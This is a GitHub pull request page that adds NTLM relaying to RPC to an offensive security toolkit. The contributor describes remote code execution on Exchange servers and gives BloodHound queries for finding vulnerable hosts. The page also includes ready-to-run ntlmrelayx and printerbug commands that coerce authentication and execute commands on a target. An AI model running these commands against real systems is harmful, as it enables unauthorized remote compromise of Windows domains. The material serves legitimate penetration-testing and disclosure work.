Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added Relaying to RPC support #857

Merged
merged 1 commit into from May 20, 2020
Merged

Added Relaying to RPC support #857

merged 1 commit into from May 20, 2020

Conversation

@mohemiv
Copy link
Contributor

mohemiv commented May 15, 2020

Hello there,

This PR implements Relaying to RPC attack which currently allows RCE in any MS Exchange via Exchange Trusted Subsystem group (All exchange systems have Administrator rights to each other via this or similar group) and printerbug.py.

BloodHound queries to find vulnerable machines

MATCH p=(a:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(b:Computer) RETURN p
MATCH p=(a:Computer)-[r:AdminTo]->(b:Computer) RETURN p

Usage
Relaying to ncacn_ip_tcp:

# Console 1
sudo python2 ntlmrelayx.py -debug -c whoami -t rpc://EXCHANGE1-ADDR
# Console 2
python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}

Relaying to IPC$ (low-privileged account needed), but requires only 445/tcp, and the connection will be encrypted:

# Console 1
sudo python2 ntlmrelayx.py -c whoami -t rpc://EXCHANGE1-ADDR -rpc-use-smb -auth-smb 'CONTOSO/test:P@ssw0rd'
# Console 2
python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}

Description
My original complete patch: https://gist.github.com/mohemiv/ab542e4ff5d8fedda790e35326705bad
MD5SUM from May 2, 2020: https://twitter.com/_mohemiv/status/1256636651780087809

The supported functions:

  1. Relaying to ncacn_ip_tcp ports to TSCH servicie
  2. Relaying to SMB to IPC$ directly to TSCH servicie

Also I've tested relaying connections to MMC20 object, but relaying to DCOM will gave you only the relayed user permissions, in my PoC it required 2 connections from the target, and there is no way to launch a DCOM object via only 445/tcp. So, the full PoC for DCOM has not been developed. Relaying to WMI is not possible as WMI requires signing.

As you already know, Compass Security company has already published the description of this attack (https://twitter.com/compasssecurity/status/1260898906629529602), but as I know from MS, the patch is not fully developed yet. May be it because of IPC$ and MMC20 examples I sent via MSRC.

For @CompassSecurity, it will be interesting to see your RPC Server and ways to get an incoming RPC connection 馃槑

@mohemiv mohemiv force-pushed the mohemiv:master branch from 65c2b24 to b5b9ca8 May 15, 2020
@mohemiv mohemiv changed the title Added Reaying to RPC support Added Relaying to RPC support May 15, 2020
@mohemiv mohemiv force-pushed the mohemiv:master branch from 724d09f to b5b9ca8 May 18, 2020
@0xdeaddood
Copy link
Contributor

0xdeaddood commented May 20, 2020

Hey @mohemiv! Great addition! It works like a charm!

@asolino
Copy link
Contributor

asolino commented May 20, 2020

Thanks a lot for the addition @mohemiv and @0xdeaddood for testing it. Merging!

@asolino asolino merged commit 3f1e7dd into SecureAuthCorp:master May 20, 2020
1 check passed
1 check passed
Travis CI - Pull Request Build Passed
Details
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can鈥檛 perform that action at this time.